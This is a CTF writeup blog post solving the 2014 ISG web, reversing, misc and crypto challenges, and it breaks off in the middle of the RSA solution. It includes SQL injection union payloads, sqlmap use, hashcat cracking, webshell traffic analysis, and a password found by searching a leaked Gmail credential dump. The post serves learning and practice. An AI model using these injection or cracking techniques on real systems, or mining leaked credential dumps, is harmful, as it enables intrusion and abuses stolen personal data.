2014 isg writeup

Posted by admin on 2022-05-17 12:10:34 in Security Blog, CTF

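0x00 Preface
It has been a long time since I posted anything, mainly because I have been exhausted ever since the Geek Challenge started. I had an ISG writeup and an XDCTF writeup that I never published.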

0x01 Web

web200 smile
Visiting the page shows a submission form.
View the page source and follow the XD link to see the PHP source:
http://202.120.7.104:8888/?view-source

<?php  
    if (isset($_GET['view-source'])) { 
        show_source(__FILE__); 
        exit(); 
    } 

    include('flag.php'); 

    $smile = 1;  

    if (!isset ($_GET['^_^'])) $smile = 0;  
    if (ereg ('\.', $_GET['^_^'])) $smile = 0;  
    if (ereg ('%', $_GET['^_^'])) $smile = 0;  
    if (ereg ('[0-9]', $_GET['^_^'])) $smile = 0;  
    if (ereg ('http', $_GET['^_^']) ) $smile = 0;  
    if (ereg ('https', $_GET['^_^']) ) $smile = 0;  
    if (ereg ('ftp', $_GET['^_^'])) $smile = 0;  
    if (ereg ('telnet', $_GET['^_^'])) $smile = 0;  
    if (ereg ('_', $_SERVER['QUERY_STRING'])) $smile = 0;  
    if ($smile) { 
        if (@file_exists ($_GET['^_^'])) $smile = 0;  
    }  
    if ($smile) { 
        $smile = @file_get_contents ($_GET['^_^']);  
        if ($smile === "(●'◡'●)") die($flag);  
    }  
?>

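Now analyze the logic. We have to submit ^_^ via GET so that $smile ends up as the string (●'◡'●), while getting past all of those filters. I was stuck on this for a long time, because the underscore filter is hard to get around. Then I noticed that ereg('%', $_GET['^_^']) only filters the GET value; the GET key is not filtered, so the _ can be URL-encoded as %5f. That takes care of the first step.
The next problem is supplying (●'◡'●) itself. The challenge hint was "URL encoding", and the long list of filtered protocols is clearly a hint too: one LFI technique for reading data is to use PHP pseudo-protocols.
So test a PHP pseudo-protocol together with URL encoding.
Capture the request in Burp; the URL-encoded string is %28%E2%97%8F%27%E2%97%A1%27%E2%97%8F%29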
ISG{_1N2N3N4N5N6B7B8B9B10B_}

web200 Find Shell
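The challenge page is an upload form. Try uploading a PHP script.
The upload succeeds, but the path is not shown. Capturing the traffic reveals a hint.
With this naming rule the file name is very long, and the last 40 characters are the SHA-1 of a random number, so it is completely unpredictable. Fortunately, I had once read an article on WooYun about exactly this:
The same design flaw present in the CMSes of all the major CMS vendors

The file can be reached through the Windows short file name (8.3) rule. So give it a try.
PS: 73dce7 is the first 6 characters of the MD5 of the uploaded file name.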

web300 X-Area
Description:
Restricted area. No entry unless invited!
http://202.120.7.110:8888
http://202.112.26.126:8888

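Opening http://202.120.7.110:8888 prompts for a username and password. Weak credentials such as admin/admin fail; cancelling the prompt reveals a hint.
The hint contains a Gmail address, so look it up in the leaked Gmail database dump I have on hand.
This gives the username and password: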
[email protected]:zasada
Login succeeds, but the page shows Access DENIED!

Viewing the source gives:

Access DENIED!<!-- <?php
/*
I found a piece of hash from an old basic auth file.
0ops:$apr1$XZ6oHreE$rYRGk9cFLxm1hF4TAc0m50
That may be helpful.
It is said that in the password nums and Lowercase letter only.
Good luck!
*/
$valid_passwords = array ("[email protected]" => "zasada");
$valid_users = array_keys($valid_passwords);

$user = @$_SERVER['PHP_AUTH_USER'];
$pass = @$_SERVER['PHP_AUTH_PW'];

$validated = (in_array($user, $valid_users)) && ($pass == $valid_passwords[$user]);

if (!$validated) {
  header('WWW-Authenticate: Basic realm="X-Area"');
  header('HTTP/1.0 401 Unauthorized');
  die ("I don't think you are '[email protected]'. Get out!");
}

eval(base64_decode('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'));
echo '<!-- ';
echo file_get_contents(__FILE__);

Decode the base64-encoded part in the middle.

Notice the echo eval(~' part. I remembered having seen PHP backdoors that apply bitwise NOT to their payload, so print that segment out, which gives:

echo eval(decrypt("17bd2ceabed35a100ffcdf5bdd901fae119585c6b54612d98043475a1f9ebcd994081fca2b348a61430746555e7c2b7753f029b58b0179cb2d117bb05f134c2da2f609b1333511fc777bfb09c2c3c84c2eb9fce031b99146369dcf2ae8246686d4ea3fd29167b67c33035bb4a275e9ecb719c37b60f5be2f22c69ce24967edc1b597a298bff905dfeee97a3a27faf79b35a83588700fb005041ceea287def48a7affb8318bbd98e9bbba296dbfda9d01", $key));

This is a call to a decryption function. Combined with the earlier code, we get:

<?php
	function decrypt($encrypted, $key)
	{
		$key=md5($key);
		$ciphertext_dec = pack("H*",$encrypted);
		$module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
		$iv = substr(md5($key),0,mcrypt_enc_get_iv_size($module));
		mcrypt_generic_init($module, $key, $iv);
		$decrypted = mdecrypt_generic($module, $ciphertext_dec);
		mcrypt_generic_deinit($module);
		mcrypt_module_close($module);
		return rtrim($decrypted,"\0");
	}
	echo(decrypt("17bd2ceabed35a100ffcdf5bdd901fae119585c6b54612d98043475a1f9ebcd994081fca2b348a61430746555e7c2b7753f029b58b0179cb2d117bb05f134c2da2f609b1333511fc777bfb09c2c3c84c2eb9fce031b99146369dcf2ae8246686d4ea3fd29167b67c33035bb4a275e9ecb719c37b60f5be2f22c69ce24967edc1b597a298bff905dfeee97a3a27faf79b35a83588700fb005041ceea287def48a7affb8318bbd98e9bbba296dbfda9d01", $key));
?>

A key is needed here. Recall the earlier hint: 0ops:$apr1$XZ6oHreE$rYRGk9cFLxm1hF4TAc0m50
Crack it on the GPU with hashcat.
Reference:
A brief introduction to Hashcat, the GPU cracking tool
Save the hash to be cracked as 1.txt.
Look up the hash type in the table.
Run: cudaHashcat64.exe --hash-type 1600 --attack-mode 3 --increment --increment-max 8 --custom-charset1 ?l?d d:1.txt ?1?1?1?1?1?1?1?1
The recovered key: 5s41t

Finally, running

<?php
	function decrypt($encrypted, $key)
	{
		$key=md5($key);
		$ciphertext_dec = pack("H*",$encrypted);
		$module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
		$iv = substr(md5($key),0,mcrypt_enc_get_iv_size($module));
		mcrypt_generic_init($module, $key, $iv);
		$decrypted = mdecrypt_generic($module, $ciphertext_dec);
		mcrypt_generic_deinit($module);
		mcrypt_module_close($module);
		return rtrim($decrypted,"\0");
	}

	$key = "5s41t";
	echo(decrypt("17bd2ceabed35a100ffcdf5bdd901fae119585c6b54612d98043475a1f9ebcd994081fca2b348a61430746555e7c2b7753f029b58b0179cb2d117bb05f134c2da2f609b1333511fc777bfb09c2c3c84c2eb9fce031b99146369dcf2ae8246686d4ea3fd29167b67c33035bb4a275e9ecb719c37b60f5be2f22c69ce24967edc1b597a298bff905dfeee97a3a27faf79b35a83588700fb005041ceea287def48a7affb8318bbd98e9bbba296dbfda9d01", $key));
?>

gives ISG{tHe_MaGic_pHP_S0UrCE_c0D3}

web400 Safesite
Description:
This is a very secure website. How can you get the flag?
http://202.120.7.109:8888
http://202.112.26.124:8888
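*Note: domain names under reallysafesite.org are bound to port 8888 on the server.

From the hint, this IP must serve some subdomain of reallysafesite.org. First add a record to the local hosts file.
Visit www.reallysafesite.org with Burp capturing, to get the GET request sent to 202.120.7.109.
Take the subdomain wordlist from dnsenum and brute-force the subdomain with Burp.
admin.reallysafesite.org:8888 returns a 302.
For convenience, add this record to the local hosts file:
202.120.7.109 admin.reallysafesite.org
Then visit the site.
Testing admin' reveals an injection. Capture the POST request with Burp,
save it as a file named sql, and run sqlmap against the POST request.
The results, in turn: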

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] safesite

Database: safesite
[1 table]
+-----------+
| isg_admin |
+-----------+

Database: safesite
Table: isg_admin
[4 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| info     | varchar(200)     |
| password | varchar(64)      |
| uid      | int(10) unsigned |
| username | varchar(32)      |
+----------+------------------+

Database: safesite
Table: isg_admin
[1 entry]
+-----+-----------------------------+----------+----------------------------------+
| uid | info                        | username | password                         |
+-----+-----------------------------+----------+----------------------------------+
| 1   | login and capture the flag! | admin    | 86c969bebab9cfeb47efcc65d85f26c5 |
+-----+-----------------------------+----------+----------------------------------+

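Next, at the login form,
determine the number of columns in the query: abc' and sleep(5) order by *#
The responses differ when * is 4 and when it is 5, so the query has 4 columns.

Choose our own password abc, whose MD5 is '900150983cd24fb0d6963f7d28e17f72'.
Since there is no way to tell which column holds the password, try them all: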

abc' union select '900150983cd24fb0d6963f7d28e17f72','admin','admin','admin'#
abc' union select 'admin','900150983cd24fb0d6963f7d28e17f72','admin','admin'#
abc' union select 'admin','admin','900150983cd24fb0d6963f7d28e17f72','admin'#		==> login succeeds; the password is in the third column
abc' union select 'admin','admin','admin','900150983cd24fb0d6963f7d28e17f72'#

The cookie is set to
Cookie: u=admin; p=b349e67445488ae1fad84633400057e759a46fb3
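Look up the p value on cmd5.
It turns out to be the MD5 of abc, hashed again with SHA-1.
My guess is that the cookie is verified again after login.
So take the admin user's MD5 password hash obtained from the injection, hash it once more with SHA-1, and get 0fa2bf55d6cb9714da177d9c59e22e51d796ab43
Then change the cookie in the GET /index.php request to this string.
This returns the flag.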
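The cookie scheme inferred above means the stored hash alone is enough to authenticate. The following added example (not code from the challenge or the original post) puts that design beside a random server-side session token. The class and function names and the sample password are this example's own, and MD5 password storage is kept in both classes only to isolate the cookie issue.

```python
import hashlib
import hmac
import secrets


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def derived_cookie(stored_md5_hex):
    """Cookie scheme inferred in the writeup: SHA-1 over the stored MD5 hex digest."""
    return hashlib.sha1(stored_md5_hex.encode()).hexdigest()


class DerivedCookieSite:
    """Weak design: the session proof is a pure function of the database row."""

    def __init__(self, users):
        # username -> MD5 hex digest, mirroring the isg_admin.password column
        self.db = {user: md5_hex(pw) for user, pw in users.items()}

    def login(self, user, password):
        if hmac.compare_digest(self.db.get(user, ""), md5_hex(password)):
            return {"u": user, "p": derived_cookie(self.db[user])}
        return None

    def authenticated(self, cookie):
        stored = self.db.get(cookie.get("u"), "")
        return bool(stored) and hmac.compare_digest(
            cookie.get("p", ""), derived_cookie(stored))


class RandomSessionSite(DerivedCookieSite):
    """Corrected design: the cookie is an unguessable token tied to server state."""

    def __init__(self, users):
        super().__init__(users)
        self.sessions = {}  # token -> username, created only by a real login

    def login(self, user, password):
        if super().login(user, password) is None:
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = user
        return {"sid": token}

    def authenticated(self, cookie):
        return cookie.get("sid") in self.sessions


def cookie_from_leaked_hash(user, leaked_md5_hex):
    """What anyone who can read the admin table can compute, password unknown."""
    return {"u": user, "p": derived_cookie(leaked_md5_hex)}
```

With the derived scheme, any disclosure of the password column is equivalent to a disclosure of every session; with random tokens the same disclosure yields nothing the server will accept as a cookie.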

web100 Up-to-date
Description:
The server is updated every week to keep flag.txt safe.
http://202.112.26.125:8888/
http://202.120.7.112:8888/

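A giveaway challenge. For a while after it was released nobody solved it and everyone was a bit confused. Then the organizers stressed that it was a giveaway, and together with the "updated every week" in the description, I guessed it was the newly disclosed bash vulnerability.
The technique is described in: CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
Take the statement from that article as is and adapt it slightly.
This gives the flag.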

0x02 Reverse
Reverse100 wangrange
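格朗 is very fond of foreign arithmetic.

IDA analysis:

In sub_401270, the input string is processed to produce 4 values, which serve as the KEY for the next round of decryption.

In sub_4013A0, the program adds 18 to each of the 4 values, treats the results as ASCII characters and prepends them to the 32 fixed strings, then calls sub_4010D0(&Dest) to decrypt each one into a character. The resulting Text is what the program pops up.

The approach is the same here: write a program and run it. I enumerated directly with the code from IDA.
One key point is that the first 4 characters are ISG{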

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
int p[10];
unsigned int v3[2];
int __cdecl sub_401000(signed int a1, signed int a2, char a3)
{
  int v4; // [sp+4h] [bp-4h]@0

  switch ( a3 )
  {
    case 'P':
      v4 = a2 + a1;
      break;
    case 'M':
      v4 = a1 - a2;
      break;
    case 'U':
      v4 = a2 * a1;
      break;
    case 'V':
      if ( !a2 )
        a2 = 1;
      v4 = a1 / a2;
      break;
    case 'X':
      v4 = a2 ^ a1;
      break;
    default:
      return v4;
  }
  return v4;
}

int __cdecl sub_4010A0(char a1)
{
  return a1 >= 65 && a1 < 75;
}

signed int __cdecl sub_4010D0(const char *a1)
{

  char v2; // [sp+13h] [bp-1Dh]@3
  int v5; // [sp+1Ch] [bp-14h]@1
  unsigned int v6; // [sp+20h] [bp-10h]@1
  int v7; // [sp+24h] [bp-Ch]@1
  unsigned int v8; // [sp+28h] [bp-8h]@1
  char v9; // [sp+2Fh] [bp-1h]@9

  v5 = 2;
  v8 = 0;
  v6 = strlen(a1);
  v7 = 0;
  v3[0] = 0;
  v3[1] = 0;

  while ( (signed int)v8 <= (signed int)v6 )
  {
    v2 = a1[v8];
    if ( v7 >= 2 )
      return -1;
    if ( (unsigned __int8)sub_4010A0(v2) )
    {
      v3[v7] *= 10;
      v3[v7] = v2 + v3[v7] - 65;
    }
    else
    {
      if ( v2 )
      {
        if ( v2 != 80 && v2 != 86 && v2 != 77 && v2 != 85 && v2 != 88 )
        {
          if ( v2 == 32 )
            ++v7;
        }
        else
        {
          v9 = v2;
        }
      }
      else
      {
        if ( v7 > 1 )
        {
          v3[0] = sub_401000(v3[0], v3[1], v9);
//          printf("\n%d\n",v3[0]);
          v3[1] = 0;
          --v7;
        }
      }
    }
    if ( v7 > 1 )
    {
      v3[0] = sub_401000(v3[0], v3[1], v9);
      v3[1] = 0;
//      printf("\n%x\n",v3[0]%0x100);
      --v7;
    }
    ++v8;
  }
//  printf("\n%x\n",v3[0]%0x100);
  return (v3[0]%0x100);
}

int __cdecl sub_401250(char a1, char a2)
{
  return (a1 >> 2 * a2) & 3;
}

char sub_401270(char a1[])
{
    int i,j;
    char v6=0;
    int v1;
    int len=strlen(a1);
    for(i=0;i<len;i++)
        v6^=a1[i];
    for(j=0;j<4;j++)
    {
        v1 = sub_401250(v6,j) + 4*len;
        p[j]=v1;
    }
}

void cal_key(char str[],char key)
{
    int i,j;
    char t;
    for(i=0x20;i<=0x6F;i++)
            for(j=0x20;j<=0x6F;j++)
            {
                str[1]=i;
                str[2]=j;
                t=sub_4010D0(str);
                if(t==key)
                {
                //    printf("find!");
                    printf("%c -> %c %c \n",key,i-17,j-17);
                }
            }

}
int main()
{
    char str1[]="PBG CBI PHJ MJH MIJ XBBH MBAE XFC MBBI XBAA XIH XGA XGG ";
    char str2[]="PBH GJ MBCF XED MDI PEI PFC XHB MEJ PDG XFC PGE ";
    char str3[]="PAA JE XGH XBAI MBCC XII PFB MHH XBCC PDI PFC XHE MFG XGF ";
    char str4[]="PAA MGD PBCH MHE XBAE PFH XHF PBCD MFE XIG PDE PHJ XBBA PDE XJH XGG PIJ XFG XJA PEG PGE ";
    cal_key(str1,'I');
    cal_key(str2,'S');
    cal_key(str3,'G');
    cal_key(str4,'{');

    return 0;
}

This yields 4 integer values, 84, 86, 85, 87, which in hexadecimal are 54, 56, 55, 57.
Then load the program in OllyDbg (OD) and patch in these integer values.

Run it and the KEY appears.

KEY: ISG{Ppp0oo01i5h_pR3f1x_N0ta7iOn}

Reverse 200 TRAC4!
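While doing the laundry, 洗衣hu washed a trace out of the clothes!
At first glance, this much assembly made my head spin, but by staying calm and reading slowly I worked it out. Adding line breaks at the CALL and JMP instructions to split the code into small parts makes it somewhat easier to read.
The program starts with a CALL 401060, which performs a series of assignments to 0x40a000.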

0x40a000
74 44 52 56 68 6c 78 4e 2b 79 63 51 59 47 4b 61 
58 30 34 38 41 50 42 55 69 33 4d 72 54 49 56 36 
32 57 62 4f 77 5a 73 35 31 37 39 76 6e 75 2f 4a
7a 6f 6b 53 43 66 70 65 67 64 6d 71 4c 6a 45 48
00

There is a jz 401083 in there; searching for that address leads to the next step.

Then at 00401031 there is another series of assignments.

0x0012ff44
4e475034 31495356 36503834 36475559
6f4c6c47 41473572 46503554 7a777849
436a5a72 4f304f41 3d436559 00

Further on there is a length check.

Following these instructions leads to 401083.

After that there is a loop.
The jnz 401218 at 00401211 is the key point. After the loop exits, the corresponding character is assigned.

The value assigned at 00401197, 49, is exactly 'I', so I guessed this could be the ISG flag.

Then we can find the remaining assignments.

This gives the KEY: ISG{7hI5_1s_4_1nsTruCti0n_tR4c3}

0x03 Misc
misc100 sqlmap
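Download the capture and open it in Wireshark.
Then filter on http to keep only the HTTP packets. sqlmap also works by imitating a web page's HTTP requests, so this shows the requests that sqlmap sent.
Looking through them, the capture was taken while sqlmap was running a blind injection. sqlmap uses bisection for this, so it is fairly easy to follow. Anyone who has used sqlmap and understands how blind injection works will find it straightforward; the flag is just a bit long.
Start from packet 808.
Look at the last packet for a character position: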

Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>73:

If there is no echoed content, the value is 73.

Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),6,1))>75: The quick brown fox jumps over the lazy dog

If the last packet does have echoed content, add 1.

Then write down the ASCII codes:

73 83 71 123 66 76 105 110 100 95 83 81 108 95 73 110 74 69 99 84 105 48 78 95 68 101 84 69 99 84 69 100 125

Converted to ASCII:
ISG{BLind_SQl_InJEcTi0N_DeTEcTEd}
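The reconstruction rule described above (take the last probe for each position, and add 1 when the page echoed content) can be automated when reviewing such a capture. This is an added example, not part of the original writeup: the two quoted lines follow the ones shown above, the longer trace is constructed by simulating a bisection, and the function names are this example's own.

```python
import re

# Shape of one response line as quoted in the writeup: the page echoes the
# injected id and, only when the injected condition is true, the message text.
TEMPLATE = ("Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) "
            "FROM isg.flags ORDER BY `value` LIMIT 0,1),{pos},1))>{thr}:")
ECHO = " The quick brown fox jumps over the lazy dog"

QUOTED_LINES = [                      # the two lines quoted in the writeup
    TEMPLATE.format(pos=1, thr=73),
    TEMPLATE.format(pos=6, thr=75) + ECHO,
]

# Captures: character position, comparison threshold, echoed text (may be empty).
PROBE = re.compile(r",(\d+),1\)\)>(\d+):\s*(.*)$")


def parse_probe(line):
    """Return (position, threshold, condition_was_true), or None for other traffic."""
    m = PROBE.search(line)
    if m is None:
        return None
    return int(m.group(1)), int(m.group(2)), bool(m.group(3).strip())


def recover_codes(lines):
    """Map position -> (character code, converged) from lines in capture order."""
    last, true_max, false_min = {}, {}, {}
    for line in lines:
        probe = parse_probe(line)
        if probe is None:
            continue
        pos, thr, was_true = probe
        last[pos] = (thr, was_true)           # later probes overwrite earlier ones
        if was_true:
            true_max[pos] = max(thr, true_max.get(pos, thr))
        else:
            false_min[pos] = min(thr, false_min.get(pos, thr))
    codes = {}
    for pos, (thr, was_true) in last.items():
        code = thr + 1 if was_true else thr   # the rule from the writeup
        # Converged only if the probes pin the value from both sides:
        # "> code-1" was answered true and "> code" was answered false.
        converged = (true_max.get(pos) == code - 1
                     and false_min.get(pos) == code)
        codes[pos] = (code, converged)
    return codes


def recover_text(lines):
    """Join recovered characters; positions never probed are shown as '?'."""
    codes = recover_codes(lines)
    return "".join(chr(codes[p][0]) if p in codes else "?"
                   for p in range(1, max(codes, default=0) + 1))


def constructed_trace(secret):
    """Constructed sample data: responses a bisection over 0..127 would leave."""
    lines = []
    for pos, ch in enumerate(secret, start=1):
        lo, hi = 0, 127                       # invariant: lo < ord(ch) <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            was_true = ord(ch) > mid
            lines.append(TEMPLATE.format(pos=pos, thr=mid) + (ECHO if was_true else ""))
            lo, hi = (mid, hi) if was_true else (lo, mid)
    return lines


if __name__ == "__main__":
    print(recover_codes(QUOTED_LINES))
    print(recover_text(constructed_trace("ISG{constructed}")))
```

The converged flag marks positions where the capture holds both bounding probes, so a truncated capture is reported as uncertain instead of silently producing a wrong character.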

misc100 chopper
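Again a pcap file is provided; open it in Wireshark.
This one is a capture of China Chopper traffic, with far fewer packets than the sqlmap challenge.
Apply the filter: http
He wrote a small webshell, and the last packet, 36, contains a file.
Use File - Export Objects - HTTP to extract the file.
Looking into the Chopper format, it adds ->| at the start and |<- at the end; strip both.
Save the result, then run file on it under Linux to check the format. Anyone familiar with it will recognize the 1F8B bytes anyway.
It is a gz file. Rename it with a .gz extension and open it with 7z.
There is a file inside,
and the flag is in it: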
ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}

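misc200 哼! (Hmph!)
We get a PNG image.
With a PNG, the worry is that something like a RAR has been embedded in it, so first run binwalk on it under Linux.
The run shows two PNG images.
The offset is 0x1D55DC. Carve the second image out with WinHex and save it as 2.png; delete that trailing part from the original final.png and save the rest as 1.png.

Now we have 1.png and 2.png. Opening them shows the same picture. Use this Linux command: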

compare 1.png 2.png diff.png

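Inspect the result.
The second row of pixels at the bottom left is anomalous. Comparing 1.png and 2.png shows that 2.png is the one with the problem.
A great tool can help here: stegsolve.jar

Then use Analyse - Image Combiner
to apply the SUB operation to 1.png and 2.png, and save the result as solved.bmp.

Then save 2.png as 2.bmp in 24-bit bitmap format. A PNG is compressed, which makes it hard to compare byte by byte, whereas a BMP is uncompressed and stores each pixel in the clear.
Another pitfall in this challenge is the offset. The PNG image is scanned from left to right and from bottom to top.
In this image the hidden data is not in the very first pixels but in the second row of pixels, so we use the advantage of the BMP format to work out the offset and locate the hidden data.
Open it in WinHex. Black is 00 in a BMP, so look for bytes that are not 00.
At offset 0x1110 there are bytes that are not 00. At first I thought these were the flag data, but it turned out that the SUB operation had affected the result.
So open 2.bmp for comparison and go to 0x1110; the region ends at 0x1330.
In 2.bmp we can see that some 00 and 01 values have been hidden. Extract this region.

Then use the regular expression b.5. to filter out everything except the 00 and 01 values. This is because of RGB: the data is hidden only in the R channel, and the other channels hold normal image data that can simply be filtered out.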

00010000010000010001000100000101000100000001010100010101010001010001000000010001000001010001000000010101000001010001000101000001000100010101010100010001000001010001010100010000000100000001000100010100000101010000010100010000000101000101010000000101000000000001010000010101000100010000010000000101000100000001010100000000000100000100000000010101010000010001010101010001

Then replace 00 with 0 and 01 with 1:

0100100101010011010001110111101101000101001101000111001101011001010111110101001101110100010001010110011100110100011011100011000001100111010100100011010001110000010010000111100101111101

With that result, use JPK:
binary-binary format
binary-binary to ascii
This gives the flag:
ISG{E4sY_StEg4n0gR4pHy}

misc50 GIF
This one is fairly easy; solved in seconds.
http://202.120.7.253/upload/isg.gif
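The challenge provides a GIF image, isg.gif.
Download it. A GIF is an animated image, and this kind of steganography usually hides data in another frame and sets a long delay so that the frame only plays after a long time. The hidden data goes unseen and the image looks static.
Split the image into frames with a tool.
The second frame contains a QR code. Scan it.
Online QR code decoder
Decoding it gives the flag: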
ISG{Solv3d_iN_SEConds_WiTH_RiGHT_T00Ls}

misc200 afere
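We get an APK. Try renaming it to .zip and extracting it.
Surprisingly it asks for a password. I thought of brute-forcing it but that turned out to be wrong; it looks like fake encryption.
Extract the dex with a Python script.
Then open the dex in JEB. The algorithm is obvious here: a variant of base64 encoding.

So write a function to build the reverse index table of a.
Then write a decoding function.

This gives the encrypted string.
After DES decryption we get the FLAG: ISG{f4kE3ncRyP710n!50ld}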

misc25 0ops
This is a giveaway that was only released at the very end: answer a survey and you get the flag.

0x04 Crypto
crypto100 Cryptobaby
talentyange got hold of a small program but does not know the password. Can you help him?
IDA analysis:

The algorithm is fairly clear, so write a program to enumerate.

#include <stdio.h>
#include <stdlib.h>

int check(char str1[])
{
    int v4=0;
    int i;
    for(i=0;i<4;i++)
    {
        v4=str1[i]+0x83*v4;
    }
    return v4;
}
int main()
{
    //freopen("out.txt","w",stdout);
    char str1[10];
    int key[]={0x0d50ade5,0x0e302789,0x0ed66f1f,0x0cd463ff,0x0e0d94dd,0x0fa4461f,0x0cd91da2};
    int i,j,k,l;

    int p=0;
    int m;
    for(m=0;m<7;m++)
        for(i=0x20;i<=0x79;i++)
            for(j=0x20;j<=0x79;j++)
                for(k=0x20;k<=0x79;k++)
                    for(l=0x20;l<=0x79;l++)
                    {
                        str1[0]=i;
                        str1[1]=j;
                        str1[2]=k;
                        str1[3]=l;
                        str1[4]=0;
                        /* compare against the m-th target hash */
                        if(check(str1)==key[m])
                        {
                            printf("%s",str1);
                            p++;
                            if(p>6)
                                return 0;
                        }
                    }
    return 0;
}

This gives the KEY ISG{c011isi0n_is_a_thre4t_t0_sec}

crypto250 RSA SYSTEM
An RSA cryptography challenge.
http://202.120.7.253/upload/rsasystem.txt
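Opening it shows a program that performs RSA encryption.
Interact with the server using nc 202.120.7.71 43434
It can do RSA encryption and decryption,
and there is also a debug function.
I had run into RSA challenges before, in both 0ctf and bctf:
0ops CTF/0CTF writeup
I used that challenge as a reference.
After some study, it turns out we can first compute N.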

Input Plaintext:
3
Your ciphertext:
58885569232010588514199718560630245564375749510573561851478247862930422478754398413916501441734672562556438960025040638930128612323201338358528377979647820470770475951549770360024665752344615132011612960919292206244738542018740538871273745698118804184934148387475351322282991974467419746153079231944187075622

Input Plaintext:
5
Your ciphertext:
98656022689841173396843599503637906770938771521909410202917788000893922098453158389169397839992062096549834245032093184693635354111149465693839929562180846475247316828148076285930773601596930751803621572491236354625755416063728553348032690795462037219833920717962889844729149924690927299000450367396817101754

Input Plaintext:
15
Your ciphertext:
89136403960909381524748983541651585629123750890346371261159589198546538322669996903722211778891944801474352115107083259601308470967487093678107418314894025097874777173986008167430124698243374734529111788669495899658729668948176168798232739924797744912946144176728331877877362277072754036267212773128207584035

3^e mod N = x
5^e mod N = y
15^e mod N = z
a = (x*y)-z =
5809416054257449899841089528618959627507584870990042160917425999115023316826202749459828683484626419375272088492237697836453626150924628845892786781925862594746738191751067547570577306330822307197399994993104529584476856686177137795847155784298767226946859059953819430869235062475451873422167175671318977468259521367761285377443856963693587244507147775361317087074438621660068800786765211832877178916404389250424104903187228075992401746398877517175735350344295661662403560656218006560066259437139886930918384532552913459887861130115114427905821873615129995108435858864483946126497080562652750285240090536778659256953


------------------------------------------------------------------------------------------------------------------------------
Input Plaintext:
2
Your ciphertext:
18877414991073471328358552734684946036056197908879813680414167733080764875427000362412400025120564275289882281698098695371990076901964203623945792607338414060720520105512530906424243619206662593629668418429352625560725666966624562851285175599560460204754980459839448773022641706055542750210348677769250360763

Input Plaintext:
7
Your ciphertext:
111454628938263521191371495060185339234370850692912383312762463327285226916071540456165777987516437333950811490651654285944048530013499195480117818451245342969739073616056664833624472945712620623349847619991185028297835663160384960250678551167765087354909610373390549388545428666461403680960909925884456212422

Input Plaintext:
14
Your ciphertext:
72565635460194103665245725639311459835757832840423543445757807475093725678813692932008580807389943735573979765906766800300664338029275733778749855279143659100381630002878046817478163793998701542395216412944332633505845521260777972145214840475616085405534405086643412315022841739930290209865279684371266627866


2^e mod N = x
7^e mod N = y
14^e mod N = z
b = (x*y)-z =
2103975283143706928086246253614221685011761207531721521045884802717034406266432331980072957121248873832892985988585697740985643149690717617405845247336781323235995271216304926526105706219446512992151674236024180777998041661237400200330754561161867044329480809266885587112138899909004114433667441606880174098297388108235673064820166938483659078158677812376325067063501738357933102110385962588406797358220865829452786142270922847236717239231012133287230995661379076433022246800129510866395749737125098176603862344638479918623944012371011044131214049676935436875327340257651670551402782305091284424898919269328795370120

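With a and b computed, N can be obtained with gcd. Both are multiples of N, because 3^e * 5^e and 15^e are congruent mod N (and likewise 2^e * 7^e and 14^e).
Here is a Python script: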

def gcd(a,b):
	while b:
		a,b = b , a%b
	return a

a = 5809416054257449899841089528618959627507584870990042160917425999115023316826202749459828683484626419375272088492237697836453626150924628845892786781925862594746738191751067547570577306330822307197399994993104529584476856686177137795847155784298767226946859059953819430869235062475451873422167175671318977468259521367761285377443856963693587244507147775361317087074438621660068800786765211832877178916404389250424104903187228075992401746398877517175735350344295661662403560656218006560066259437139886930918384532552913459887861130115114427905821873615129995108435858864483946126497080562652750285240090536778659256953
b = 2103975283143706928086246253614221685011761207531721521045884802717034406266432331980072957121248873832892985988585697740985643149690717617405845247336781323235995271216304926526105706219446512992151674236024180777998041661237400200330754561161867044329480809266885587112138899909004114433667441606880174098297388108235673064820166938483659078158677812376325067063501738357933102110385962588406797358220865829452786142270922847236717239231012133287230995661379076433022246800129510866395749737125098176603862344638479918623944012371011044131214049676935436875327340257651670551402782305091284424898919269328795370120

print gcd(a,b)

N= 163299923594725837822065466024252288369968345166114296775267398674135203232399369097066231911703932876685787200953804367999219404652277507051132477767780777171583401548512406822302682440462953734186505877480309334593204565155837915080069002132147202319079756766392254726664638975415908872910181448796479878521

Next we use a property of congruences:
if a % N = A and b % N = B, then (ab) % N = (AB) % N
Look at the debug function in the code:

secret = pow(int(open("flag.txt").read().strip().encode('hex'), 16), e, N)

def debug():
    print "I have no bug"
    print str(secret)


I have no bug
82938526687718470294491483403921860413192132827953695938770369409277502099989415324075790953012392184291358444443432233906559795134109912114370645058540251648761071123189585640228592437123293017660245076622212966902149908768100524662729622741444969760800686741993211073779566049439089106465265811847465509264

Here we compute with c1 = secret and c2 = the ciphertext of 3:

c1 = 82938526687718470294491483403921860413192132827953695938770369409277502099989415324075790953012392184291358444443432233906559795134109912114370645058540251648761071123189585640228592437123293017660245076622212966902149908768100524662729622741444969760800686741993211073779566049439089106465265811847465509264
c2 = 58885569232010588514199718560630245564375749510573561851478247862930422478754398413916501441734672562556438960025040638930128612323201338358528377979647820470770475951549770360024665752344615132011612960919292206244738542018740538871273745698118804184934148387475351322282991974467419746153079231944187075622
N = 163299923594725837822065466024252288369968345166114296775267398674135203232399369097066231911703932876685787200953804367999219404652277507051132477767780777171583401548512406822302682440462953734186505877480309334593204565155837915080069002132147202319079756766392254726664638975415908872910181448796479878521
print c1*c2%N

Running this Python script gives the result:

79179219947397673596913141858060853562264183277105064500526121181949051885226022286753492605088856943457103934674109091329935444332268497553408733577823437960592170878157899870065319472135912042160495919712578115084987878867194393987073798043704976793068142053136698484109814814341457569230801157307343303787

Submit this to the RSA system for decryption:

